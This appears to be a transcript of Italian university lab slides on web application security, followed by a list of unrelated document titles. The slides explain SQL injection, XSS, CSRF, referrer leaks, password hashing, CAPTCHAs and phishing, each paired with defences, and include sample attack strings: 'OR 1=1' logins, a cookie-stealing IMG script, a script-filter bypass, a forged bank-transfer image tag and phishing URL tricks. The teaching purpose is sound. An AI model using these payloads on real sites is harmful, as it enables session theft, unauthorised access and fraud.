Laboratorio di reti II: Problematiche di sicurezza delle reti
|
|
- Anna Orlando
- 8 anni fa
- Visualizzazioni
Transcript
1 Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
2 La sicurezza nelle reti Nella programmazione web è necessario tenere sempre presenti problematiche di sicurezza Utenti malevoli possono tentare di attaccare applicazioni web per ottenere vantaggi per se o anche solo per causare danni Esistono numerose problematiche da considerare sia per siti web che per altre applicazioni Nel progettare un applicazione è necessario pensare alle possibili debolezze e a come prevenire i relativi attacchi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
3 Entità di una minaccia Per determinare l entità di una minaccia, considerare i seguenti fattori: La facilità con cui l attacco può essere messo in pratica L entità del danno che è possibile provocare A seconda del tipo di applicazione, è opportuno realizzare diversi livelli di sicurezza Per esempio è importante che in un applicazione di e-commerce non ci debba essere alcuna debolezza. In un applicazione meno cruciale qualche buco che non può portare a grossi danni e che è difficilmente sfruttabile da un attaccante potrebbe essere un problema perdonabile Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
4 Implementare la sicurezza web Quando si realizza la sicurezza in un sito web, si deve cercare quindi il giusto bilanciamento tra sicurezza, usabilità e tempo impiegato per l implementazione In ogni caso è necessario considerare le varie minacce per poter valutare i rischi che si corrono e le eventuali conseguenze di un attacco Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
5 Proprietà da salvaguardare Alcune caratteristiche di un applicazione web che vanno tutelate da problemi di sicurezza sono le seguenti: Integrità dei dati, sia dell applicazione stessa che quelli contenuti nella macchina dove viene eseguita Riservatezza: i dati privati relativi ad un utente o più in generale informazioni contenute sulla macchina contenente l applicazione devono restare riservati Rispetto delle autorizzazioni: un utente non deve avere la possibilità di eseguire operazioni che non è autorizzato ad eseguire, o di eseguirle a nome di altri Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
6 Sicurezza a più livelli Spesso per garantire la sicurezza si effettuano controlli a più livelli dell applicazione In altre parole, un modulo dell applicazione non accetta automaticamente i dati provenienti da un altro modulo ma effettua un ulteriore controllo Un tipico esempio è quello di eseguire controlli sulla correttezza dei dati sia nel codice lato server che come vincoli del database Questi meccanismi vengono ampiamente sfruttati soprattutto, ma non solo, per le applicazioni dove la sicurezza è un fattore critico Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
7 Sicurezza lato utenti Molte problematiche di sicurezza possono essere risolte se l utente che fa uso del sito o dell applicazione prende determinate precauzioni E tuttavia sbagliato presupporre che tuti gli utenti ne siano a conoscenza: implementando un sito web si deve tutelare la sicurezza anche degli utenti meno esperti Cercare di effettuare più controlli possibile per la sicurezza lato applicazione Un esempio: molte webmail hanno un antivirus incorporato, nonostante molti utenti più esperti effettuerebbero comunque per conto loro un controllo per virus o diffiderebbero da allegati sospetti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
8 Gestione degli accessi e cookie Nei siti web gli accessi vengono solitamente gestiti tramite chiavi di sessione contenute lato client in un cookie Se un attaccante si appropria quindi di una chiave di sessione in un cookie di un determinato utente, questo può accedere al relativo sito come se fosse l utente vittima Così si possono verificare molteplici problemi di sicurezza, come la visualizzazione di informazioni private, l acquisizione di privilegi e permessi o l effettuazione di operazioni a nome di un altro utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
9 Code injection Code injection Una delle problematiche relative a siti web riguarda i casi dove del codice inserito da utente viene inserito in del codice da eseguire Un attaccante può avere la possibilità di iniettare del codice maligno che verrà eseguito Uno dei casi più comuni è quello dell SQL injection Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
10 Code injection SQL injection Consideriamo il caso di un login implementato in PHP L utente inserirà nome utente e password in una form, ed il codice PHP estrarrà i parametri ricevuti (solitamente in POST) Per verificare che il login sia corretto, spesso viene controllato se una query come la seguente ottiene risultati: "SELECT * FROM users WHERE username= $user AND password= $pass "; Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
11 Code injection SQL injection Il problema con un implementazione di questo tipo è che i dati sottomessi da un utente possono venir interpretati ed eseguiti come codice SQL Un attaccante che sospetti che l implementazione del sito sia stata realizzata in questo modo,potrebbe inserire come password per garantirsi l accesso la stringa x or 1=1 La query SQL inviata al database sarebbe in questo caso SELECT * FROM users WHERE username= anyusername AND password= x OR 1=1 ; Che restituisce tutta la tabella users visto che la condizione 1=1 è sempre verificata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
12 Code injection SQL injection In questo caso, presupponendo sempre che il codice lato server non contenga troppi controlli, solitamente viene ottenuto l accesso con l utente relativo alla prima riga della tabella Con un po di tentativi per indovinare i nomi delle colonne, si può ottenere l accesso con uno specifico utente inserendo come password una stringa del tipo x OR username= admin Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
13 Code injection SQL injection Considerando che è possibile creare query annidate e, in alcuni server, inviare molteplici query al server SQL separate da un ;, tramite SQL injection si può inviare pressochè qualsiasi query al DB Un esempio da non provare: xkcd.com Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
14 Code injection SQL injection: soluzione Soluzione al problema dell SQL injection: validare qualsiasi input da utente che andrà a finire come parte di una query SQL Esistono numerosi metodi in molti linguaggi per imporre che una stringa non possa provocare comportamenti anomali Per esempio, inserendo dei caratteri di escape per ogni carattere speciale che può essere interpretato dal linguaggio (nell esempio, l apice) Altrimenti, si possono accettare come input solo stringhe con caratteri alfanumerici o trattini Per questo spesso in nomi utenti e password non sono permessi caratteri speciali come asterischi o apici Per maggiore sicurezza, è oppurtuno accedere al DB dall applicazione web con un utente con diritti ristretti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
15 Code injection Code injection: PHP o JSP Un altro esempio di code injection si può verificare quando un sito permette di sottomettere codice HTML che verrà poi visualizzato Per esempio in molti forum viene permesso di inserire nei post codice HTML per permettere una formattazione ed un aspetto del testo configurabile Il problema si pone anche quando all utente viene permesso di eseguire l upload di un file che poi verrà pubblicato in rete In questo caso può essere possibile inserire codice PHP o JSP che poi verrà eseguito dal server quando la pagina contenente il codice viene richiesta Per esempio sarebbe possibile sottomettere <?php function evilfunction() {... } evilfunction();?> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
16 Code injection Code injection: PHP o JSP Soluzione: come per l SQL injection, validare ogni input da utente Sostituire ad esempio ad ogni simbolo < la sequenza di escape < Può essere inoltre una buona idea eseguire il server web da un utente con permessi limitati, in modo che anche nel caso qualche falla di sicurezza sfugga al controllo il danno provocato sia limitato Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
17 Code injection Code injection: problematiche Per probletatiche di code injection non è sufficiente eseguire validazioni lato client tramite Javascript o Applet Non si ha mai il controllo del lato client: un utente malevolo può manipolare liberamente i parametri in uscita tramite vari programmi Per lo stesso motivo, non è sufficiente limitare le scelte nei form tramite menu a tendina, se poi non ci sono opportuni controlli lato server Una volta che il lato server è ben implementato, controlli lato client sono comunque molto utili in quanto permettono ad un utente di correggere dati non validi senza ricaricare tutta la pagina Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
18 Cross site scripting Problematiche di sicurezza delle reti Code injection Un altra problematica di code injection più sottile è il cross site scripting (XSS) Questa si può verificare quando si può sottomettere codice HTML in un sito che verrà visualizzato da altri utenti Questo succede per esempio nei forum ma anche nelle caselle di posta consultabili via web, in quanto nelle è consentito il codice HTML Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
19 Cross site scripting Cross site scripting L obiettivo del XSS tipicamente è quello di appropriarsi del cookie di accesso di un utente al sito in questione Il codice Javascript eseguito ha accesso ai cookie del sito stesso Al codice JS non viene permesso di collegarsi ad altri siti se non quello di origine, ma il browser può essere indotto ad inviare dati ad un terzo sito tramite determinati tag HTML come IMG Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
20 Cross site scripting Cross site scripting Tramite il tag IMG è necessariamente permesso l accesso a immagini su altri domini Per ottenere i cookie di un utente, avendo a disposizione un dominio è possibile usare un codice simile al seguente: <script type= text/javascript > document.write("<img src= + document.cookie + " >"); </script> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
21 Cross site scripting Cross site scripting A questo punto il server può salvare il valore del cookie ed inviarlo all attaccante che può accedere al sito bersaglio con le credenziali della vittima Può essere implementato uno script che salvi il parametro in GET prima di restituire l immagine, oppure semplicemente il valore del cookie può essere letto nel log delle richieste del server Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
22 Cross site scripting Cross site scripting: soluzioni Soluzioni per il cross site scripting: Per siti che premettono di inserire HTML, non permettere l inserimento di tag <SCRIPT> Eseguire controlli di validazione accurati. Rimuovere tutte le occorrenze di <SCRIPT> per esempio non è sufficiente: l attaccante potrebbe inserire la stringa <SCR<SCRIPT>IPT> Nelle mail in HTML, non permettere l esecuzione di script oppure negare l accesso a immagini esterne al sito Per una maggiore sicurezza, cambiare periodicamente il valore del cookie utilizzato per l accesso alla sessione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
23 Cross site request forgery Cross-site request forgery Un altro tipo di attacco simile al XSS è il cross-site request forgery (CSRF, letto Sea-Surf) Questo tipo di attacco punta a far eseguire delle operazioni a cui non si avrebbe accesso ad un utente autorizzato I presupposti necessari sono i seguenti Si ha la possibilità di sottomettere codice HTML ad una vittima tramite mail o siti vulnerabili che lo permettono La vittima possiede un cookie che permette l accesso ad una risorsa al quale l attaccante vuole accedere Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
24 Cross site request forgery Cross-site request forgery Di nuovo, tramite il tag IMG si induce la vittima a mandare richieste HTTP formulate dall attaccante ad un terzo sito Tali richieste rappresentano l azione che l attaccante vuole realizzare tramite le autorizzazioni concesse alla vittima Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
25 Cross site request forgery Cross-site request forgery Un esempio di CSRF. L utente A è loggato al sito per l accesso alle sue operazioni bancarie Il sito contiene un form per i versamenti che alla sottomissione dei dati richiede una pagina del tipo importo=...&destinatario=... L utente B invia ad A una mail con il codice <IMG src= versamento?importo=1000e&destinatario=b > Quando A leggerà la mail, il browser invierà una richiesta HTTP alla pagina web indicata cercando di caricare l immagine Il sito rileverà tramite il cookie che la richiesta arriva da A ed autorizzerà l operazione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
26 Cross site request forgery Cross-site request forgery: soluzioni Soluzioni contro il CSRF: Come per il XSS, non permettere in forum e webmail la visualizzazione di immagini esterne al sito Impostare la durata dei cookie di accesso ad un tempo limitato Nei form che permettono operazioni importanti, inserire un campo hidden generato a caso ad ogni richiesta; nella pagina sucessiva, autorizzare l operazione solo se sia il cookie sia il parametro nascosto corrispondono Lato utente, eseguire il logout da siti sensibili prima di visitare forum o webmail che si sospetta siano mal implementati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
27 Problematiche relative all HTTP-referer Problematiche relative al referrer Altre problematiche esistenti sono causate dal campo di intestazione HTTP HTTP-referer Questo campo della richiesta HTTP viene impostato al valore dell URL dal quale è stata fatta la richiesta dalla nuova URL Se in un URL A un utente clicca un link alla URL B, la richiesta HTTP per questo secondo indirizzo conterrà come HTTP-referer l URL A Lo stesso vale per richieste di immagini all interno di una pagina web. Il controllo di questo campo viene a volte utilizzato per impedire l accesso ad una immagine al di fuori del contesto di una determinato sito Questo campo spesso viene utilizzato per sapere da dove arriva il traffico diretto verso il proprio sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
28 Problematiche relative all HTTP-referer Problematiche relative al referrer Il campo referrer può causare diversi problemi di filtraggio di informazioni Nel caso l identificativo di sessione di un sito sia propagato tramite GET, questo facendo parte dell URL viene inviato nel campo HTTP-referer ed un sito maligno lo può intercettare e farne uso In alcuni casi si possono generare problemi di privacy, in quanto ad un sito vengono inviate informazioni relative ad una visita ad un altro sito da parte di un utente Sempre nel caso di forum e webmail per esempio, se l URL contiene un identificativo relativo al nome utente grazie ad un immagine esterna si può sapere quali utenti hanno visualizzato la mail (o il post) e quali no Tecnica a volte usata da spammer per capire quali siano le caselle attive Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
29 Problematiche relative all HTTP-referer Problematiche relative al referrer Soluzioni alle problematiche relative al referrer: Se l ID di sessione viene passato tramite GET, cambiarne il valore tra una richiesta e l altra Lato utente, fare attenzione ai link cliccati se l URL contiene informazioni sensibili Ulteriormente, si può evitare di specificare il campo HTTP-referer nelle proprie richieste HTTP tramite apposite impostazioni del browser Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
30 Riservatezza di password Riservatezza delle password nel DB A volte è necessario salvare le password degli utenti in un database ma si vuole impedire che anche persone che hanno accesso al DB (come il personale tecnico) non possano vedere le password Sebbene questa tipologia di persone ha possibilità di maneggiare il database, in certi casi l appropriazione della password può essere una minaccia maggiore Per esempio una modifica del database è rilevabile più facilmente e grazie ai vari log si può solitamente risalire all utente che la ha effettuata. Ottenendo una password invece si può impersonare un altro utente del sistema in modo anonimo Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
31 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Il problema si risolve tramite l uso di funzioni hash Una funzione hash prende come argomento una stringa e ne restituisce un altra (di solito di lunghezza fissata) che gode delle seguenti proprietà: Data una qualsiasi stringa in uscita dalla funzione, non si conosce alcun modo efficiente per trovare una stringa in entrata corrispondente Le possibilità di comparire delle varie stringhe in uscita sono approssimativamente uguali Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
32 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Funzioni hash molto note sono MD5 e SHA. Librerie per calcolarle sono fornite per numerosi linguaggi di programmazione Spesso le funzioni hash sono anche utilizzate per verificare l integrità di pacchetti software Per verificare che un pacchetto software distribuito su vari domini estranei al programma non sia stato alterato, viene fornito un codice hash che consente all utente di verificarne l autenticità Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
33 Riservatezza delle password nel DB Riservatezza di password nei DB: soluzione A questo punto, la soluzione al problema è di memorizzare nel database non la password stessa ma il risultato della funzione ad essa applicata Quando un utente richiede un login con una determinata password, si verifica se l hash della password ed il valore nel database corrispondano Con questa tecnica anche vedendo il database non si ha nessuna informazione sulle password usate Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
34 Uso di captcha Problematiche di accesso automatico Un altra problematica di molti siti è di evitare l accesso automatizzato da parte di programmi Si può desiderare per esempio che un numero molto grande di utenti fittizzi vengano registrati automaticamente Può essere inoltre necessario prevenire tentativi di accesso non autorizzati tramite attacchi a forza bruta ad una password da parte di programmi Sebbene tentare tutte le password di una lunghezza abbastanza grande sia proibitivo, questo attacco potrebbe aver successo nei riguardi di password brevi o deboli con l ausilio di un dizionario di password frequenti Una soluzione potrebbe essere di bloccare l account dopo n tentativi, ma questo impedirebbe l accesso anche a chi ne ha diritto Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
35 Uso di captcha CAPTCHA Per risolvere questo problema sono stati creati i CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) Questi consistono in caratteri opportunamente distorti e confusi visualizzati in un immagine che gli attuali programmi non sanno riconoscere Un utente verrà quindi identificato come umano solo se riconosce correttamente la scritta del captcha. Per ogni accesso dovrà essere generata chiaramente una diversa immagine Non tutti i CAPTCHA in circolazione sono inattaccabili, in quanto alcuni possono venir effettivamente decifrati da alcune tecniche. Fidarsi del tutto quindi solo di CAPTCHA opportunamente testati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
36 Uso di captcha Attacco ai CAPTCHA E stata provata una tecnica per l aggiramento dei CAPTCHA basata sull appoggio su di un altro sito web complice basato sul seguente meccanismo Il programma per l accesso automatizzato richiede l operazione proibita e riceve un CAPTCHA da decifrare Il programma invia il CAPTCHA al sito complice, che richiederà ad uno dei suoi utenti di decifrare il CAPTCHA per poter accedere a del contenuto Se l utente inserisce il codice, il programma lo invierà al sito attaccato ottenendo l accesso Questo tipo di attacco comunque non viene considerato grave in quanto il numero di accessi che si riesce ad ottenere non si avvicina all ordine di grandezza degli accessi possibili tramite una procedura del tutto automatizzata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
37 Segretezza delle comunicazioni Segretezza delle comunicazioni Un altra problematica della programmazione di reti è quella della segretezza delle comunicazioni Tutto quello che viaggia nella rete da una macchina all altra può essere potenzialmente intercettato e letto Per dati sensibili, è necessario un sistema di crittografia che renda l informazione illeggibile da terzi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
38 Segretezza delle comunicazioni Uso di protocolli criptati Per questo scopo sono stati creati dei protocolli modificati che fanno uso di algoritmi crittografici Per quanto riguarda HTTP, esiste il protocollo HTTPS. Questo fa uso di HTTP e TCP ma interpone tra questi due un protocollo di cifratura delle informazioni Un altro esempio di protocollo sicuro è SFTP per il trasferimento sicuro dei file Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
39 Phishing Phishing Il phishing è un tentativo di ottenere informazioni riservate di un utente facendogli credere di avere a che fare con un sito affidabile Solitamente si ottiene mascherando un URL ad un sito con un altra. Il sito destinazione potrebbe essere una copia del sito originale in modo da indurre l utente ad inserire dati personali (username e password, numero di carta di credito...) Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
40 Phishing Modalità del phishing Esistono diversi modi per mascherare un URL con un altra. Il più semplice è inserire nel contenuto del tag <a> un link diverso da quello puntato. <a href= > Un altro modo è di utilizzare la chiocciola, che in un URL specifica il nome dell utente. Visto che solitamente non è un informazione necessaria, tutto quello che la precede viene solitamente scartato Se l URL è molto lunga, il sito finale potrebbe non esere facilmente visibile <a href= Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
41 Phishing Modalità del phishing Un altro modo per effettuare il fishing è di utilizzare delle pagine in alcuni siti che effettuano automaticamente una redirezione ad un altro sito specificato tra i parametri Tali pagine vengono a volte utilizzate per conteggiare il numero di click effettuati sui vari link esterni, per esempio fare delle statistiche Es. Per nascondere ulteriormente il vero link, questo a volte viene codificato tramite i caratteri di escape dell HTML Ancora: un sottodominio di un sito malvagio può essere confuso con un dominio affidabile da un utente inesperto, come nell URL >...</a> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
42 Phishing Phishing: soluzioni Soluzioni al phishing: fortunatamente, molti browser implementano meccanismi che riconoscono se l indirizzo di un link è sospetto e lo segnalano all utente Un altra soluzione è di inviare i link cliccati ad un autorità che esegue questa verifica in remoto Da questa soluzione possono nascere problemi di privacy... Mail che contengono tentativi di phishing vengono spesso individuate dai server di posta o da alcuni antivirus e segnalate come pericolose all utente In alcuni casi, è comunque necessaria dell accortezza lato utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
43 Esercizio Esercizio Analizzare le possibili minacce che possono essere messe in atto sul sito del forum Per ognuna di esse, valutare quanto gravi possono essere le conseguenze e con quanta difficoltà la minaccia può essere messa in atto Risolvere i problemi di sicurezza ritenuti più gravi secondo la precedente analisi, facendo in modo che questo pesi meno possibile sulle funzionalità del sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43
SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE
SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE S O. S E. B I. P R O D O T T I E S E R V I Z I P E R I B E N I C U L T U R A L I So.Se.Bi. s.r.l. - via dell Artigianato, 9-09122 Cagliari Tel. 070 / 2110311
DettagliLegenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.
Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il
DettagliAttacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)
UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL
DettagliManuale operatore per l utilizzo dell utente di dominio
Manuale operatore per l utilizzo dell utente di dominio Sommario Manuale operatore per l utilizzo dell utente di dominio... 1 1. Account personale di dominio... 2 2. Account generico di dominio... 2 3.
DettagliCorso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti
Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione
DettagliTeamPortal. Servizi integrati con ambienti Gestionali
TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione
DettagliGuida alla registrazione on-line di un DataLogger
NovaProject s.r.l. Guida alla registrazione on-line di un DataLogger Revisione 3.0 3/08/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 17 Contenuti Il presente documento è una guida all accesso
DettagliMANUALE PARCELLA FACILE PLUS INDICE
MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella
DettagliManuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise
Manuale Amministratore Legalmail Enterprise Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Pagina 2 di 16 Manuale Amministratore Legalmail Enterprise Introduzione a Legalmail Enterprise...3
DettagliClient - Server. Client Web: il BROWSER
Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare
DettagliProgrammazione Web. Laboratorio 4: PHP e MySQL
Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi
DettagliGuida di Pro Spam Remove
Guida di Pro Spam Remove 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) FILTRO 5) ARCHIVIO E-MAIL 6) NOTE CONCLUSIVE 1) SOMMARIO Pro Spam Remove è un software che si occupa di bloccare tutto lo
DettagliGRUPPO CAMBIELLI. Posta elettronica (Webmail) Consigli di utilizzo
GRUPPO CAMBIELLI Posta elettronica (Webmail) Consigli di utilizzo Questo sintetico manuale ha lo scopo di chiarire alcuni aspetti basilari per l uso della posta elettronica del gruppo Cambielli. Introduzione
DettagliLe caselle di Posta Certificata attivate da Aruba Pec Spa hanno le seguenti caratteristiche:
1 di 6 05/01/2011 10.51 Supporto Tecnico Quali sono le caratteristiche di una casella di posta certificata? Come ricevere e consultare messaggi indirizzati alle caselle di posta certificata? Come posso
DettagliTitolare del trattamento dei dati innanzi descritto è tsnpalombara.it
Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione
DettagliUna minaccia dovuta all uso dell SNMP su WLAN
Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità
DettagliObiettivo dell esercitazione
Database e Web - Esercitazioni ASP - Andrea Proli proliand@csr.unibo.it Laboratorio di Basi di Dati A.A. 2005/2006 Obiettivo dell esercitazione L obiettivo finale dell esercitazione è quello di creare
DettagliEsempio Cookie Policy
Esempio Cookie Policy INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cascinaladoria.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le
DettagliSSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer
: applicazioni telematiche Secure Socket Layer E-commerce Trading on-line Internet banking... Protocollo proposto dalla Netscape Communications Corporation Garantisce confidenzialità e affidabilità delle
DettagliLa firma digitale CHE COSA E'?
La firma digitale La Firma Digitale è il risultato di una procedura informatica che garantisce l autenticità e l integrità di messaggi e documenti scambiati e archiviati con mezzi informatici, al pari
DettagliMac Application Manager 1.3 (SOLO PER TIGER)
Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i
Dettagli19. LA PROGRAMMAZIONE LATO SERVER
19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici
DettagliBibliografia: Utenti e sessioni
Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.
DettagliAlfa Layer S.r.l. Via Caboto, 53 10129 Torino ALFA PORTAL
ALFA PORTAL La struttura e le potenzialità della piattaforma Alfa Portal permette di creare, gestire e personalizzare un Portale di informazione in modo completamente automatizzato e user friendly. Tramite
DettagliInternet e posta elettronica. A cura di Massimiliano Buschi
Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp
DettagliManuale Utente Albo Pretorio GA
Manuale Utente Albo Pretorio GA IDENTIFICATIVO DOCUMENTO MU_ALBOPRETORIO-GA_1.4 Versione 1.4 Data edizione 04.04.2013 1 TABELLA DELLE VERSIONI Versione Data Paragrafo Descrizione delle modifiche apportate
DettagliNelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento
I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere
DettagliModulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress
Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk
DettagliProcedura SMS. Manuale Utente
Procedura SMS Manuale Utente INDICE: 1 ACCESSO... 4 1.1 Messaggio di benvenuto... 4 2 UTENTI...4 2.1 Gestione utenti (utente di Livello 2)... 4 2.1.1 Creazione nuovo utente... 4 2.1.2 Modifica dati utente...
DettagliObiettivi d esame PHP Developer Fundamentals on MySQL Environment
Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web
DettagliGUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB
GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB Copyright 2014 Wolters Kluwer Italia Srl 1 Sommario 1 Come accedere al Pannello di gestione... 4 2 del Pannello di gestione del sito web... 5 3 delle sezioni...
DettagliCONTENT MANAGEMENT SY STEM
CONTENT MANAGEMENT SY STEM I NDI CE I NTRODUZI ONE Accesso al CMS 1) CONTENUTI 1.1 I nserimento, modifica e cancellazione dei contenuti 1.2 Sezioni, categorie e sottocategorie 2) UTENTI 3) UP LOAD FILES
DettagliCookie e Webstorage. Vediamo ora i metodi dell oggetto localstorage. Per memorizzare un valore si utilizza il metodo setitem:
Cookie e Webstorage Un cookie (letteralmente biscotto) è un pacchetto di informazioni che viene salvato sul computer dell utente. In successive sessioni di collegamento a Internet (normalmente per un periodo
DettagliInformativa estesa sull utilizzo dei cookie
Informativa estesa sull utilizzo dei cookie che Gli OPTIMA utenti visiona S.R.L. vedranno le pagine utilizza inserite del i Cookie sito. delle per quantità rendere minime i propri informazioni servizi
DettagliPRODUZIONE PAGELLE IN FORMATO PDF
Requisiti minimi: PRODUZIONE, FIRMA E PUBBLICAZIONE DELLA PAGELLA ELETTRONICA CON ALUNNI WINDOWS PRODUZIONE PAGELLE IN FORMATO PDF Argo Alunni Windows aggiornato alla versione più recente. Adobe PDF CREATOR,
Dettagli--- PREMESSE INTRODUZIONE. .:luxx:.
SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una
DettagliPEC. Posta Elettronica Certificata. securepec.com
PEC Posta Elettronica Certificata securepec.com SECUREPEC La nuova evoluzione nell invio di messaggi La Posta Elettronica Certificata (PEC) è l evoluzione della posta elettronica convenzionale. E la posta
DettagliAmbulatorio Virtuale Medinformatica Sistema On Line per richiedere Appuntamenti e Ricette
Ambulatorio Virtuale Medinformatica Sistema On Line per richiedere Appuntamenti e Ricette Egregio Dottore, Gentile Dottoressa, abbiamo il piacere di presentarle il nuovo sistema informatico per la gestione
DettagliLA GESTIONE DELLE VISITE CLIENTI VIA WEB
LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici
DettagliINFORMATIVA ESTESA SULL USO DEI COOKIE
